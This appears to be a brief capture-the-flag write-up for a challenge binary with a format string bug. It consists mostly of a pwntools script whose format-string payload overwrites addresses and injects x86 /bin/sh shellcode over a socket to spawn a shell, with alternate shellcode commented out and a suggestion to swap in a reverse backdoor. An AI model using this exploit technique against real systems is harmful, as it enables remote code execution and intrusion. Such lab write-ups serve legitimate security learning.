You can get bin file at here
I think it's funny program. Someone predict 2012 was last year of earth but that was wrong.
This programs function is related with it and I thought it was funny idea.
Anyway, this program has FSB in fnprintf. So you can easily crack it. I used python script to do that.
from pwn import *
import time
# dup2(4) as our socket is fd 4
shellcode = '\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45375c'+'%n'+'%22167c'+'%n'+'\n'
shellcode += "\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n"
#shellcode += "\x31\xc0\x31\xdb\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6"
# /bin/sh polymorphic
#shellcode += "\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81"
proc = remote('localhost', 23456)
print proc.recv(1024)
#print proc.recv(1024)
proc.sendline(shellcode)
time.sleep(5)
proc.interactive()If you change shellcode += "\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n" this line,
you can pwn it. You can change reverse backdoor or other shell code.
I can't understand why I can only get shell in gdb